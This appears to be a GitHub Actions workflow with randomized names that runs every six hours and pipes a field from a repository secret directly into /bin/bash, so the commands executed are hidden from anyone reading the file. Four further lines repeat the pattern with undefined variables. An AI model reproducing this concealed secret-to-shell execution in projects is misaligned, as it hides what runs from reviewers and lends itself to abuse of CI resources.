name: dengshiyu3340
on:
  workflow_dispatch:
  schedule:
    - cron: '13 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dengshiyu3340
        env:
          eyepx02: ${{ secrets.eyepx02 }}
        run: |
          echo $eyepx02 | jq -r .em0540 | /bin/bash
          echo $ubajc639 | jq -r .kjg44 | /bin/bash
          echo $vmwwf02168 | jq -r .aoyob751 | /bin/bash
          echo $h256 | jq -r .u90792 | /bin/bash
          echo $hl35535 | jq -r .gxhwq9179 | /bin/bash

